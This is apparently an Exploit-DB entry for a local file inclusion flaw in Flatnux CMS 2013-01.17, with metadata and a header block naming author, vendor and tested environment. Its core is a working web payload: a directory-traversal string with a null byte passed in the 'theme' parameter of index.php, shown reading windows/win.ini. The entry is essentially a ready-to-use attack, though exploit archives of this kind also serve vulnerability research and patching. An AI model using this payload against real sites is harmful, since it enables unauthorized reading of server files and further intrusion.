EXPLOITS

Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion

Author: DaOne
type: webapps
platform: php
port: 
date_added: 2013-03-22  
date_updated: 2016-10-24  
verified: 1  
codes: OSVDB-91937  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comflatnux.png  

raw file: 24870.txt  

##########################################
[~] Exploit Title: Flatnux CMS Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne aka Mocking Bird
[~] Vendor Homepage: http://flatnux.altervista.org/
[~] Software Link: http://flatnux.altervista.org/download.html?f=Flatnux-Next/flatnux-2013-01.17.zip
[~] Category: webapps/php
[~] Version: 2013-01.17
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################

# Exploit
index.php?theme={localfile}{nullbyte}
http://localhost/flatnux/index.php?theme=../../../../../../../../../../windows/win.ini%00